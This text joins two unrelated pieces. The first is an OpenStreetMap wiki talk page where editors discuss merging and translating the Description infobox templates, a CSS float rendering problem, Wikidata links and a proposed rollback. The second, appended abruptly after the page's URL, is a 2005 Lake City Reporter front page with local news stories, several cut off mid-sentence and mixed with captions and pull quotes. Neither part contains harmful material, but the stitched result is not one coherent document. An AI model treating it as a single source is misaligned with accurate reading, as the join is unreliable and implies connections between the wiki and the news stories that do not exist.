- The +/- icon displayed in the upper right corner points to nowhere in your template. In the original it allowed editing the template itself, though I never understood why it was there. {{ElementUsageLang}} - I am still missing the translation of links when you click on an element icon. My versions led to Cs:Node, Cs:Way, ... - Overpass - well, I think that the icon was nice, but let's wait and see if others have an opinion as well - taginfo - I think that there will be complaints about the current implementation of this. I believe that for any language there is a specific set of taginfos which are interesting for each country. For Czechs, the German, Austrian and Slovak ones are interesting. For Slovaks it might be Czech and Hungarian. For Germans it would be Austria and Switzerland. For the UK maybe Commonwealth countries, ... So I think that you should include the general worldwide TagInfo box as it was in the original template, including Overpass, and then a country-customizable selection of other taginfos (maybe initially collapsed as it was before). Just my opinion. - Chrabros (talk) 03:47, 9 April 2014 (UTC) - After a bit of experimenting, I see what you mean about the green tick. With my browser, it seems to be heavily dependent on the width of the window: if you start with a smallish browser window, and increase the width a bit at a time, there's a point at which the layout changes significantly and displays the odd behaviour which you describe. I don't know what's causing that, but it's almost certainly to do with CSS and layout. I'm not wanting to get into that just now, as it looks as if it's going to affect only relatively few pages. Yes, it would be interesting to get to the bottom of it, and I expect that I will, but it's going in low on the list of priorities. - The +/- link at the top goes nowhere at the moment, but goes to the place where this template will end up when it's moved out of user space. Granted, that's not much help at the moment.
The presence of links like this is related to the Wikipedia Navbar template, which includes links to view, edit or discuss the template. Perhaps it's time to be bold and change it to something more like the Wikipedia navbox links, so it's actually more useful. - I think you're right about people appreciating more taginfo links, as discussed at the links I pointed you to earlier. My main aim at this stage was simply to standardise the current forty-or-so templates, producing functionality which was broadly in line with the best aspects of each of them. There haven't been many taginfo links so far, so I've not incorporated any additional ones at this stage. These can, and I'm sure will, be added later. - The good news is that I've updated the element icons so that they link to language-specific pages if they are available. That matches what you're used to with cs, but also with pl, ja, uk and it. There are some languages where these now link to non-English pages where that wasn't the case before, such as fr, so that's a good example of taking a good idea from some templates and making it available to all languages. I think we're getting to a point where, with your help, we've got a long way with cs, and the other languages will benefit from that. Thanks. :-) Moresby (talk) 11:00, 9 April 2014 (UTC) Problem(s) This discussion was moved from User talk:Moresby. On the page Tag:tourism=theme_park there is a problem with your ValueDescription-Template and Template:Tag stub: They are overlapping. --LordOfMaps (talk) 09:24, 17 April 2014 (UTC) - OK, I finally tracked down the problem. It was a CSS rendering bug in Chrome, and I have now submitted my findings to Google. I've identified a workaround which should solve the problem. It will take a few hours for the wiki to rebuild all the affected pages, but after that there should be no more problems! Thanks. Moresby (talk) 15:18, 17 April 2014 (UTC) - Thanks! - It looks OK now. - But a bug in Chrome?
I had the problem using Firefox. --LordOfMaps (talk) 18:18, 17 April 2014 (UTC) - Ooh, interesting. Like most bizarre happenings, it seems to have been caused by an interaction of several odd things. I boiled it down to the following, which seemed to work OK in Firefox, but not in Chrome (both on Ubuntu): <html> <body> <div style='float: right; width: 150px; border: 2px solid black;'>aaaaaaaaa</div> <div style="float: right; width: 250px; border: 2px solid black; clear: right;">bbbbbbbb</div> <div style="text-align: right;">cccccccc <!-- icon --></div> </body> </html> - I don't think that the content of the divs was supposed to overlap, so I put this down to a Chrome bug. That was enough to find me a workaround, which seemed like a win. It's entirely possible that I've inadvertently removed another important component of the problem in my analysis, in which case it's even more complicated than I thought. Or I just messed up somewhere along the line. Perhaps I'll try it again in Firefox to see. But I might let sleeping dogs lie.... :-) Thanks again. Oh, and thanks for picking up the German translation on some of the templates - most grateful. Moresby (talk) 18:37, 17 April 2014 (UTC) - This is definitely not a bug in Chrome, but your misunderstanding of how "float:" works in CSS: it is floating within the box of the nearest ancestor element which is positioned (with position:relative or position:absolute or float:*). In your HTML, the only box element that is positioned is the "html" element (positioned by the viewing window); the effect of "clear:*" is also relative to the same ancestor box.
- So what you get is "aaaaa" aligned to the right margin inside the html box, then "bbbbb" is displayed just below (because of clear:right), but the third element is NOT floating, and its width is then the width of its parent element (the width of body, which is itself close to the width of html): the image will then be aligned to the right, but NOT to the right margin, because the floating "bbbbbb" occupies that position; - Yes, the third "div" overlaps the second one, but the image in it will not overlap the content of the second div, even if the third div is text-align:right.... - In summary you must get this layout: aaaaaaa (to the right), then below it "ccccc", the icon, and "bbbbbbb"; but if on the second line not everything fits, the second line will still display "bbbbbb", with "ccccc" before it if it can fit, but the icon will wrap below onto a third line (the two floating elements will not move; they are positioned first, before "ccccc" and the icon, which flow around the two floats). Note also that the third line does not float around the two floats, because of the effect of clear on the second div: clear has the effect of clearing only the right margin, but the third div is not moved down because it is still positioned by the position on the *left* margin (even if its content is text-align:right) - The only way to get three non-overlapping floated divs is to embed them in a "position:relative" div, make the 3 divs floating, and then append a 4th empty div (within the main relative div) containing "clear:both", so that the relative div will contain everything, even if the floats inside it are overflowing.
<html> <body> <div style="position:relative"> <div style="float: right; width: 150px; border: 2px solid black;">aaaaaaaaa</div> <div style="float: right; width: 250px; border: 2px solid black;">bbbbbbbb</div> <div style="float: right;">cccccccc</div> <div style="clear:both"></div> </div> </body> </html> - Note in that case that the first two divs are allowed to show side by side: bbbb must be to the left of aaaa (which is the rightmost) or below aaaa if bbbb can't fit the width in the remaining margins. - Also the third div showing ccccc and the icon can show side by side: cccc and the icon must be to the left of bbbbb (which is more to the right) or below bbbb if cccc and the icon don't fit. - But note also that the third div does not specify a width, so its default width is still 100% and does not fit in the margins partly occupied by the first two float divs, so the whole div will wrap below the two first floats... - Floats in HTML/CSS are complex to understand the first time. You need to understand the CSS box model and the full effects of "position:", "float:" and "clear:". You also need to understand what "width" designates: it does not include the outer margins, borders, and paddings of the element (except if you use a new CSS3 property to change the "box-sizing" model to be the "border-box", like IE6 does by default, whereas the default standard in HTML is the "content-box"). — Verdy_p (talk) 16:56, 26 May 2015 (UTC) Website and URL pattern It seems we need to continue the discussion from Template_talk:KeyDescription#Website and URL pattern because the fields in question have been carried over to the unified template. Given that a majority had stated their opposition to these highly specialized fields, and Andy did not respond to the objections for two weeks, I think these fields should be removed from this template again unless convincing new arguments are brought forward.
--Tordanik 20:11, 18 April 2014 (UTC) - We should be having any discussions of these useful parameters in a more prominent place than one user's transitive sub-page's talk page; I'll respond at Template_talk:KeyDescription. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 21:16, 18 April 2014 (UTC) Missing templates You overlooked {{el:KeyDescription}} and {{pt-br:KeyDescription}}. --Andrew (talk) 09:56, 20 April 2014 (UTC) - Rats, they've come in since I started, and I'd not noticed them. :-( Thanks - I'm impressed! Moresby (talk) 12:04, 20 April 2014 (UTC) - Also {{KeyDescription no translation}} and {{ValueDescription no translation}}. --Andrew (talk) 14:56, 20 April 2014 (UTC) - And {{Wertbeschreibung}}. --Andrew (talk) 18:03, 20 April 2014 (UTC) Formatting of parameters Hi Moresby, I think you should stop trying to format the parameters in templates by including spaces. I apparently use a different font or editor than you do, and therefore it actually looks worse after you add those spaces to align the equals signs. I believe that this will be true for others as well. Thanks. Chrabros (talk) 05:33, 23 April 2014 (UTC) Thank you for doing this This discussion was moved from User talk:Moresby. The templates with the Pt-br: prefix needed maintenance and nobody knew or had the time to fix them. Thanks for doing this work. --Jgpacker (talk) 20:51, 23 April 2014 (UTC) - You're welcome - and it's really kind of you to say so. Thank you. Google translate suggests: "Seja bem-vindo". :-) Moresby (talk) 20:36, 23 April 2014 (UTC) Templates without image parameter Now that the dust of the big changes has settled, I'd like to bring up the topic of how to handle templates with no image being set. The current behaviour (which was introduced along with the template restructuring) is to show a huge version of the "key" or "key=value" icon. I would prefer to just use no image at all in those cases (e.g. abstract things like Key:type).
--Tordanik 08:45, 27 June 2014 (UTC) - The only image I could think of for type is the relation icon. While there are certainly pages without images that could have them, an abstract image or the old way of nagging about it with “No image yet” seems pointless. --Andrew (talk) 08:17, 28 June 2014 (UTC) Wikidata There is a discussion on whether/how to keep the recently added wikidata parameter at Template talk:ValueDescription#Wikidata. --Andrew (talk) 12:03, 2 September 2014 (UTC) Why is statuslink present in the documentation but not used in the template? Open questions: - Should pages outside the English namespace link to the English proposal? - What if the proposal wasn't translated into the page's language? Should we link to the English proposal? Should we show a red link? - If a proposal is in multiple languages, which of them is the 'main' one? The first appearance in the docs. 02:34, 12 December 2014 (UTC) - I think the parameter statusLink should be available in the template, but it doesn't quite seem like it's either ever been added -- or added back after some refactoring was done. I can't tell. However, either way, to answer your questions from my subjective point of view: I think pages outside the English namespace should (at least for the time being) link to the English proposal. It seems the most natural, as the majority (all?) of proposals are in English, though the process doesn't say anything about this being a requirement. This extends to point #2, and here I feel the same way: for the time being, simply link to the main proposal page. It shouldn't do anything else, nor care about namespace -- the main proposal page only exists in one location and language, from what I've mostly seen. The main one would be the proposal composed by the original team/author, as deemed by the submitter.
Messy Unicorn (talk) 03:42, 1 January 2015 (UTC) Wikidata link Having a magic number that links to a cryptic page can frighten new users and wastes space for established ones who will tune it out. Wikipedia doesn't link like this even when it generates content from Wikidata. Even if having the reference makes sense for machine-reading pages, it shouldn't be visible. --Andrew (talk) 09:56, 30 December 2014 (UTC) - Please do not remove the Wikidata link. The hokum that this "can frighten new users" is without foundation, and we are not going to run out of space on our wiki pages. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 10:44, 30 December 2014 (UTC) - I agree that it can be slightly problematic. Most users probably don't know what Wikidata is. Wikipedia links are more usable/friendly and often available in the wiki page. As Wynndale pointed out, we can leave the parameter without making it visible. --Jgpacker (talk) 14:27, 30 December 2014 (UTC) - You may agree, but where is the evidence? Hiding values is harmful; it leads to people not spotting errors. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 15:05, 30 December 2014 (UTC) - Wynndale, so what is your proposed action? What does Wikipedia use to link to Wikidata? --Jojo4u (talk) 13:08, 7 February 2015 (UTC) - Wikipedia uses Wikidata by searching it for an item that matches the current page name (in the "wikipedia" properties). When an entry is found, it will list the other "wikipedia" links found in the matching Wikidata entry (those entries will be added to those for which there are explicit interwikis to specific Wikipedias; but those are now deprecated and no longer necessary: if they are present, they override the interwikis found in Wikidata for the same language, and the link found in Wikidata will not be displayed; but Wikipedia will still include a link at the bottom of the list to show the existing Wikidata page that has been found).
- However this OSM wiki still does not know how to query Wikidata to retrieve a list of Wikipedias (in fact this wiki does not perform any queries to Wikidata; it does not even have an interwiki for it, so we link to Wikidata via Wikipedia, or use absolute URLs). Effectively this wiki does not have the MediaWiki extension for the Wikidata client. — Verdy_p (talk) 17:11, 26 May 2015 (UTC) Rendering Could we include rendering, as seen, for example, in Tag:historic=memorial#Rendering, in a table in this template? I've made the template {{Rendering}}, which may help. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 16:14, 27 April 2015 (UTC) - Ooh, I quite like that! Moresby (talk) 20:30, 27 April 2015 (UTC) - OK, I've implemented that in this template, and on the above article. As you can see, the table markup has gone awry. Can anyone fix it, please? Otherwise, feel free to revert me and I'll try again later. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 22:25, 27 April 2015 (UTC) - I don't think that the infobox is the right place for rendering. In my opinion, the infobox needs to be somewhat short to be useful, which is hard to achieve once the list of projects becomes longer. But perhaps more importantly, many features cannot be displayed as a mere icon; there needs to be more room to also allow area features and the like. This means that a gallery in the body of the wiki page would be a much better solution. I have therefore reverted your additions for now. Let's discuss this for a bit more than 6 hours before deciding on a solution. --Tordanik 09:12, 28 April 2015 (UTC) - And many can be displayed as an icon; since the parameter is optional, it can be used where suitable, and not otherwise. Where icons are available it makes sense to have them in a place which is predictable and machine-parsable.
Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 11:51, 28 April 2015 (UTC) - Ok, I'm going to explain my point of view in some more detail: - I agree that the location should be predictable. But displaying the rendering in different places, depending on whether it's rendered as an icon or a larger area, is not predictable. It would be much more consistent to always have a rendering gallery in a "Rendering" subsection after "How to map" and "Examples". - I believe that it's not a good idea to have all these images uploaded manually. It would be better to automate this, and therefore ensure that the rendering being displayed is always the latest one. Therefore, I think you have it backwards: Ideally, the rendering data would not be readable by machines, but written by machines (e.g. based on Taginfo's project feature or, if Jochen is not interested in that, a different database). - What's your opinion on this? I hope we can still make progress through discussion rather than a revert war. --Tordanik 12:21, 28 April 2015 (UTC) - I agree with the given points. Previously we were placing only the current and most popular renderers on the wiki. Today there are way more programs that use OSM data (the most recent ones being OSMAnd and maps.me). - You may be surprised, but many wiki readers are used to different renderers than those presented at Tag:historic=memorial#Rendering right now. - I wish we had the option to store user preferences in cookies and only display the preferred renderers for each visitor. But this is a challenging task to do on a wiki AFAIK. Xxzme (talk) 14:33, 28 April 2015 (UTC) - I'm not in the least surprised; that's why I made a template which can be expanded as the community sees fit. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 20:48, 28 April 2015 (UTC) - The template I created can also be written by machines. It would also be possible to extend it, or to create an alternative, for linear and area renderings. Wikis are intended to be improved incrementally.
Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 20:48, 28 April 2015 (UTC) The changes I made have now been reverted by an admin, who has also protected the page. What shocking behaviour. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 20:48, 28 April 2015 (UTC) - The shocking behaviour begins with your edit (1). Please put your changes to a vote first of all (lists.openstreetmap.org). We will not argue. And we do not need an edit war in an important template! In addition, your extension caused errors. Read in DE --Reneman (talk) 21:31, 28 April 2015 (UTC) - Your comment is nonsensical. What are you trying to say? Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 22:24, 28 April 2015 (UTC) Edits since January 2015, consider reversion I find some of the edits during this year to the templates {{Description}}, {{KeyDescription}}, {{ValueDescription}}, {{RelationDescription}}, {{DescriptionLang}} and {{StatusLang}}, also the documentation subpages {{Description/doc}}, {{KeyDescription/doc}}, {{ValueDescription/doc}}, {{RelationDescription/doc}}, {{DescriptionLang/doc}} and {{StatusLang/doc}}, to be of low quality and not improvements to the carefully thought-out and multilingual set of templates. Therefore I propose to roll the templates back to their state on 1st January, only keeping translations of keywords into more languages and changes that can be defended as improvements. Sorry if I haven't appreciated the benefits of any edits. --Andrew (talk) 18:45, 18 May 2015 (UTC) - Also {{ElementUsageLang}} and {{ElementUsageLang/doc}}. Any blocked users who want to comment can post on the Wiki team forum. --Andrew (talk) 05:02, 19 May 2015 (UTC) - Please be more specific: Which parameters would be affected or removed; and what else would change?
Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 07:57, 19 May 2015 (UTC) - I'm not pointing to individual edits because I believe people should be given a second chance, but specific issues include variation in the colours of infoboxes and depopulation of Category:Cs:Czech Documentation. I am also concerned about a possible control agenda in some edits that sees the quality of OSM's tag documentation as acceptable collateral damage, and this may have led to side effects that I'm unaware of. --Andrew (talk) 06:17, 20 May 2015 (UTC) - I'm not asking you to point to individual edits; I'm asking you to detail the changes you propose to make. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 10:58, 21 May 2015 (UTC) - I want to roll the seven templates I named and their documentation subpages back to their state at the beginning of this year, only keeping changes established as beneficial in this discussion (currently extra translations and statuslink) and reverting the others whole. --Andrew (talk) 17:52, 21 May 2015 (UTC) - I know you do; I read what you wrote above. I've asked you more than once now to describe in detail what the effect of doing that would be. You seem surprisingly reluctant to do so. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 18:24, 21 May 2015 (UTC) - The changes I want to roll back are the ones in the page histories of the pages I've listed; although I haven't completely analysed one or two of them, regressions reported on the editor's talk page make it clear that they didn't understand the full effects either. Again, I don't think it's helpful to name individual editors here as it may hinder them from constructive work in the future. --Andrew (talk) 11:55, 22 May 2015 (UTC) - Oppose per the lack of an answer to my question above. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 18:24, 21 May 2015 (UTC) - Well, I would be glad if my Category:Cs:Czech Documentation would work again.
I do not know why it stopped working and I suspect the recent changes have broken something. Chrabros (talk) 06:44, 22 May 2015 (UTC) The changes since January have been (excluding those already reverted): - To {{Description}}: - Link for statuslink parameter (to be kept). - Change of colour to white to stop an argument, not as a considered change. - Massive rearrangement of whitespace that broke relation descriptions and makes extensive other changes harder to follow. - Depopulation of Category:Cs:Czech Documentation. - Removal of link to source for images. - To {{KeyDescription}}: - Low-value fiddling. - To {{ValueDescription}}: - Low-value fiddling. - To {{RelationDescription}}: - Hurried workaround to changes to {{Description}}. - To {{DescriptionLang}}: - To {{StatusLang}}: - Ordering by string instead of language (need to consult translators on whether this is good). - Updated translations to French and Czech (to be kept). - To {{ElementUsageLang}}: - Ordering by string instead of language (need to consult translators on whether this is good). --Andrew (talk) 18:56, 25 May 2015 (UTC) - Many of the partisan descriptions above amount to "The changes have been changes". In the absence of more useful descriptions - and veiled threats notwithstanding - I remain opposed to a wholesale rollback. Andy Mabbett (User:Pigsonthewing); Andy's talk; Andy's edits 19:26, 25 May 2015 (UTC) - Overall I agree with the reverts proposed. Fiddling with whitespace seems to be mostly scratching an itch, but it's too easy to break something, and it was made in a way that makes it costly to review. Also, I think ordering by language is better, because otherwise a translator may easily miss other strings.
--Jgpacker (talk) 02:23, 26 May 2015 (UTC) - What is your view as a Portuguese speaker of the use of pt | pt-br = collapsed together in the changed translation templates? --Andrew (talk) 06:13, 26 May 2015 (UTC) - It's ok if they really are equal, but preferably it should be done by a native Portuguese speaker if they don't already have the same translation. If there was only one of them with a translation, and another was added without review by a native speaker, then it should be reverted, but if they were already equal and they were collapsed like that, then I would guess it's okay. --Jgpacker (talk) 13:13, 26 May 2015 (UTC) - Even if there's a single reviewer for one version, it is still preferable to create it for both versions of the language; otherwise one reader will see a Portuguese message, and another will just see the default English fallback (which is worse, even if there's a need for a small change for the second version). Mutual understanding is guaranteed between the two variants of the language (and in fact, both countries have now agreed to accept mutual additions or variations in normal usage; separate terminologies are no longer required). On Wikipedia, both versions are equally accepted. In my view, maintaining two versions on this wiki is just a waste of time and effort. - The situation is a bit different for "zh-hans" vs. "zh-hant", because this wiki still does not feature the automatic transliterator used on Wikipedia, so a single "zh" version still does not work properly. - However we don't need "zh-tw", "zh-cn", "zh-sg" (which were used on Wikipedia and are now highly deprecated in favor of distinction by script variants).
- For the same reason, we don't need "md", or even "ro-md", but we may need "ro-cyrl" for Moldavian (however script transliterators would work better), which is in fact written there in both the Latin and Cyrillic scripts (with no real difference in Latin from Standard Romanian; "Moldavian" was invented in the 1950s in the USSR and there were then attempts to integrate Russian terminology into it; this failed, and in fact Moldavians are either using the standard Russian language directly, or the Romanian language only transliterated automatically to Cyrillic, or standard Romanian in the Latin script; Romanian just uses the basic Latin alphabet with diacritics for two additional consonants; these combined letters are unambiguously converted to Cyrillic; some Cyrillic letters are not easily transliterated to Latin, but are actually not used for Moldavian - they are used only for Russian or Bulgarian terms...). So it would be fair to support "ro-cyrl" here for Moldavian, in addition to "ro", only because we still don't have transliterators on this wiki, but more importantly because automatic transliterators would break many pages containing English terms or terms in Latin-written languages other than Romanian. As well, the transliteration from Cyrillic would break Russian and Bulgarian words (which should still not be transliterated). A transliterator may work on this wiki in the future, but only if we can properly tag all multilingual content with the correct language code (so that only Romanian/Moldavian will be affected, but not everything else). Transliterators could also be implemented only in wiki editors to help contributors, but only if they save to appropriate pages tagged with "Ro:" or "Ro-cyrl:" prefixes in page names. However it is not worth the effort, given the very small number of real contributors for Moldavian (who in fact prefer contributing only in standard Russian or standard Romanian).
Moldavian supporters are in fact very few, and this is a very small country whose population is divided between pro-Romanians and pro-Russians, with in fact little support for "Moldavian" as a separate entity (this distinct linguistic support only existed for a couple of decades, and stopped long before the collapse of the USSR; now only the nationality/ethnic concept remains, but local communities prefer supporting standard Romanian or standard Russian... or both, without mixing their respective scripts). - (This is not the case for Serbo-Croatian, whose division is now effective and increasing between dual-scripted Serbian, Latin-only Croatian... and Latin-only Bosnian, another recent creation mixing some aspects of "pure" Croatian, "pure" Latin-Serbian, and some aspects borrowed from Albanian in an attempt to unify the country)... - As well, it is still necessary to maintain separate Latin and Cyrillic versions for Serbian (a transliterator could do the job, but this would cause problems if applied blindly to a complete page). — Verdy_p (talk) 16:36, 26 June 2016 (UTC) The changes to documentation subpages since January have been (excluding those already reverted): - To {{Description/doc}}: - Changes to documentation of status parameter (deserves a separate review). - Addition of editing warning (to be kept). - Adjustment of wiki syntax (to be kept). - To {{KeyDescription/doc}}: - Tidying of documentation and additional explanations (to be kept). - Addition of editing warning (to be kept). - To {{ValueDescription/doc}}: - Addition of editing warning (to be kept). - Adjustment of wiki syntax (to be kept). - To {{RelationDescription/doc}}: - Adjustment of wiki syntax (to be kept). - To {{DescriptionLang/doc}}: - Table of translations flipped (columns were languages, now translations).
- This is the most important change: there were already too many columns, and with the table's restricted width, not only did you have to scroll horizontally, but all texts were split across multiple lines with one or two words per line.
- In addition, the code to do that was huge and contained errors caused by incorrect copy-pasting. Now it is much shorter and simpler: you can also add translated languages easily by editing only one line, and the tables are readable. Note that this table is actually not part of the doc; it is just a testcase shown at the end of the doc to give a status of existing translations; the template is not used this way anywhere else.
- I am definitely not convinced this is "poor quality"; it is really improved quality (with easier maintenance as well), and it was absolutely not a change to the template itself (since when are doc pages templates? There are many templates having absolutely no documentation on this wiki and never tested with enough test cases). Ideally even this long table should not be part of the /doc subpage but of a testcases subpage (initially it was in /table, to be visited via a link from the doc page, but it has remained in the /doc page, as it was). — Verdy_p (talk) 15:26, 26 May 2015 (UTC)
- To {{StatusLang/doc}}:
- To {{ElementUsageLang/doc}}:
--Andrew (talk) 06:13, 26 May 2015 (UTC)
- Note also that these translations (in the template, not the doc page) were really bad and unmaintained, or just copies of English, because these translatable strings were added at different times but not maintained the same way across languages. It is much safer to keep each translation per resource. This allowed adding correct translations that were missing, without having to duplicate them. For example, pt and pt-br were already copies of each other (except one that was showing English).
Switching first by resource name and then by language allows simpler maintenance of each resource, even if for a new language this means editing in several places (but there's no need to add any #switch: translators use the same model used for translatable switches — they just insert a single line with the leading language code, and can easily add fallbacks (such as "pt|pt-br=" or "zh-hans|zh-hant=" when they are the same; if it is needed to separate them, it is easy to duplicate that line, separate the codes, and edit one of them, as in all other translated templates). Other fallbacks better than English can also be easily specified (e.g. "fr|br|oc=" to reuse the same French resource when the "br" or "oc" resources are still not there).
- Also, the last resources at the end were actually not translated at all in most languages (they used "TranslateThis" multiple times); now the "TranslateThis" is factorized into just the default line and does not need to be edited. Language fallbacks are useful in all translated projects (before the flip, the only fallback possible was to English).
- If you want to add new items to translate, you don't need to review all the existing translations and update them: add the resource with a single TranslateThis English fallback, then add a single line for a language you know, without assuming that the English fallback will always be used. Translators also don't have to translate everything; they translate item by item, without copying blocks. Overall the code size is even smaller, and translations occur within the context of a single translation unit (exactly as in ".pot" files, Translatewiki.net, the CLDR survey, or other translation projects: this is the standardized way, where we work unit by unit).
- Final note: the TranslateThis template generates an image and a link that do not fit correctly in translations that are used in "title=" attributes for showing hints; this generates incorrect HTML or incorrect wiki syntax.
The inclusion of the TranslateThis template should be conditional (there were cases where this broke the generated page in languages that were incompletely translated). For now I've not found any way on this wiki to filter out the HTML presentation in resources that are used in a way supporting ONLY plain text without any additional HTML element or link, as this wiki does not have this filtering capability. Only in some cases, for specific resources, using TranslateThis may be safe (but the target of the link is still wrong). In my opinion, the icon and link should not be used, and the Description box templates should just include a single small "translate" link in the box, showing where it is translatable: the link can just point to the box template page showing the list of templates containing translatable resources in its documentation. — Verdy_p (talk) 16:11, 26 May 2015 (UTC)
Unlinked image
The image was recently changed such that clicking it doesn't lead to the original picture (with [[{{{image|}}}|200px|link=]]). The image should be linked or have a link to its full-size version and attribution. Mrwojo (talk) 15:29, 23 May 2015 (UTC)
- This link change was unexpected; the "|link=" part can be removed without problem (but it was already present in some other parts of the template for other icons). — Verdy_p (talk) 15:17, 26 May 2015 (UTC)
- As there were three comments above requesting the restoration of the link, I restored it (but not for the other icons, which all used the empty "|link=" parameter). If you wish you can add "|image_caption=" (optional); however, this parameter is still not used in the 3 main templates using Template:Description (for relations, tags, or features). — Verdy_p (talk) 17:23, 26 May 2015 (UTC)
One discussion place
Currently, discussion about Template:Description is spread across this page, Template talk:KeyDescription, and Template talk:ValueDescription.
This triples the time needed to check and cuts the chance of a successful discussion to one third. I propose to put an ambox on the top and bottom of Template talk:KeyDescription, Template talk:ValueDescription, and Template talk:RelationDescription stating that topics which affect all those templates should be discussed here. --Jojo4u (talk) 12:07, 22 May 2016 (UTC)
Remove User:Moresby links from See Also
On Template:Description, in the section "See Also", there are three links to the User:Moresby namespace. I guess they can be removed now? --Jojo4u (talk) 12:13, 22 May 2016 (UTC)
Support of value only
The values *=construction and *=proposed are used for many keys with the same meaning. Potentially also *=sidewalk (for footway, path, cycleway). Using Template:ValueDescription with key=* and value=construction gives links to Key:* and Tag:*=scheduled, which does not look good.
- What would be the best way of using the current templates for *=construction?
- Would another template (e.g. ValueOnlyDescription) be useful?
- What about a new namespace: ?
--Jojo4u (talk) 13:52, 22 May 2016 (UTC)
Separating usage and proposal status
I started a discussion about separating usage and proposal status in this template.
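As a concrete illustration of the per-resource layout described in the DescriptionLang thread above, a translated resource can be kept as a single #switch over the language code, with fall-through case labels for shared fallbacks. This is only a hypothetical sketch — the resource name and the translations below are illustrative, not the actual contents of {{DescriptionLang}}:

```wikitext
<!-- Hypothetical sketch: one #switch per resource, one line per language.
     Fall-through case labels ("pt | pt-br") share a single translation,
     and "fr | br | oc" makes "br" and "oc" fall back to French. -->
{{#switch: {{{lang|en}}}
| fr | br | oc = Statut
| pt | pt-br = Estado
| zh-hans | zh-hant = 状态
| #default = {{TranslateThis}} Status
}}
```

To let pt-br diverge later, a translator duplicates the shared line, separates the codes, and edits one copy — exactly the per-unit workflow described above.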
http://wiki.openstreetmap.org/wiki/Template_talk:Description
On the Hardwood — Columbia, Fort White gear up for district basketball tournament.
Clearing the Way — Officials begin demolition work to protect Rose Sink. Local & State, 6A

Tuesday, February 15, 2005 — Lake City, Florida — 50¢
Weather: Partly Cloudy, High 78, Low 51. Forecast on 2A

Unnamed murder suspect already in custody
Man suspected of the Jan. 18 killing in jail for another crime.
By JUSTIN LANG
jlang@lakecityreporter.com
The Lake City Police Department says it has a suspect in custody for the Jan. 18 murder of a homeless man; however, the inmate has yet to be charged in the crime. Investigators have not released the suspect's name, only that he is a black male and is being held at the Columbia County Detention Center on an unrelated charge with a $250,000 bond. With murder charges still pending, Laxton provided few details other than to say the investigation into the Jan. 18 killing of James Derrick Razor, 39, is still ongoing and police are working closely with the State Attorney's Office. "We are still working on it and we have a suspect in mind, but that's all we can say about it," Laxton said. He said he didn't know when the suspect may be charged with Razor's murder. "We are just taking our time and making sure everything is done right," Laxton said. Laxton said he feels confident with the suspect and the murder charge that is likely forthcoming. Two local women found Razor's body on Jan. 20 lying in the grass beside an abandoned house at 803 Dundee Way and called 911. When police responded to the scene, they say Razor was found fully clothed, apparently having died of a gunshot wound to the head.
Investigators soon learned he had been released from the detention center on Jan. 18 after being held on charges of misdemeanor marijuana possession and violating the city's open container (of alcohol) law. Police said it was Razor's second time at the (MURDER continued on page 11A)

The healing power of pets
Lake City Medical Center introduces new therapy
By JUSTIN LANG
jlang@lakecityreporter.com
Some patients at the Lake City Medical Center received a special Valentine's visit Monday afternoon from therapist Pepi McClead. Her first time at the medical center, Pepi was pleased to receive a joyous welcome from all staff and patients she came across. So enthusiastic was she that Pepi soon went into the room of 93-year-old patient Clarice Witt of Lake City, jumped into the bed and curled up right beside her. For anyone else, the behavior might seem odd, but being a black, white and brown Papillon, it was excused and even welcomed. A certified pet therapy dog, Pepi was at the medical center Monday for the facility's first day of offering the service to its patients. Delores Brannen, director of marketing, said it was a delightful coincidence the

[Photo] JUSTIN LANG/Lake City Reporter — Lake City Medical Center patient Clarice Witt, 93, of Lake City touches the soft fur of Pepi McClead, a pet therapy dog from Columbia County Senior Services. The medical center started pet therapy for the first time Monday, giving patients an unexpected Valentine's Day gift.

"We want them to feel at home here, so we want to bring the pet to them." — Delores Brannen, marketing director, Lake City Medical Center

first day also happened to be Valentine's Day. But she said the planning for pet therapy at Lake City Medical Center actually began about three months ago as a way to further expand its range of patient care. "It's just another service we wanted to be able to offer our patients," she said. "We want them to feel at home here, so we want to bring the pet to them."
Kathy Wisner of Columbia County Senior Services is helping to coordinate pet therapy at the medical center and brought Pepi around to patients on Monday. Pepi is owned by Don and Mary McClead (Mary is a painting instructor for Senior Services) and had to undergo both training and an extensive health certification to become an official pet therapy dog. Since being certified, she has made previous therapy visits to patients at North Florida Regional Medical Center in Gainesville. Dr. Brent Hayden, who happened upon Pepi in the halls of the local medical center Monday, said he is in (PETS continued on page 11A)

Fort White student gets appointment to Air Force Academy
Student among 1,200 across country selected for academy
By TONY BRITT
tbritt@lakecityreporter.com
FORT WHITE — Bryan Taylor's childhood dream of becoming an F-16 fighter pilot is about to materialize before his eyes. Taylor, a Fort White High student, has received an appointment to attend the U.S. Air Force Academy in Colorado Springs, Colo., as part of the academy's Class of 2009. "I think it's really cool," Taylor said of his appointment. "It's something only a few people in the state get to do." According to reports, Taylor is one of only 1,200 students nationwide to receive the appointment. Taylor, 18, said he has thought about going into the Air Force since he was a small child because he always wanted to fly. Taylor also said several of his family members have served in the Air Force, including his stepfather, both of his grandfathers and his brother. Keith Hatcher, principal of Fort White High School, said Taylor is the first student from his school to earn an appointment to the academy. "Bryan is a great kid," Hatcher said. "He's a good role model, a go-getter and anything you ask him to do, he'll do. He's a great student and athlete and I'm proud of him."
Taylor, 18, said at times his confidence wavered as he waited to get word whether he would be admitted to the (ACADEMY continued on page 11A)

Olustee Festival collector's item available soon
Special envelope with Olustee cancellation on sale Friday at festival.
By TONY BRITT
tbritt@lakecityreporter.com
